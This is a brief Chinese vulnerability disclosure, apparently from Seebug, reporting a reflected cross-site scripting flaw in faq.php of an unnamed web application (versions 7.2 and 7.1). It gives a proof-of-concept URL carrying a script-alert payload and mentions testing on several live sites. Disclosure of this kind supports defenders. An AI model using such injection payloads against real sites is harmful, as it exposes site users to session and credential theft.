### 简要描述:
版本。7.2.7.1都可以X。。只是试了几个站。
其他版本没测试。
### 详细说明:
文件出在faq.php。。faq.php?action="><script>alert('XSS')</script>search& 提交到本页面。然后登陆 。。跨站形成。
### 漏洞证明:
测试站点:
[<img src="https://images.seebug.org/upload/201101/131302006941767e4e1781d1ad95a54cc71aacaf.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201101/131302006941767e4e1781d1ad95a54cc71aacaf.jpg)
[<img src="https://images.seebug.org/upload/201101/131301511949a2f032b97cd6d6e285cd5ad291bd.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201101/131301511949a2f032b97cd6d6e285cd5ad291bd.jpg)
[<img src="https://images.seebug.org/upload/201101/1313014440521166d73b2cffb6f5acc201228180.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201101/1313014440521166d73b2cffb6f5acc201228180.jpg)
京公网安备 11010502034610号
暂无评论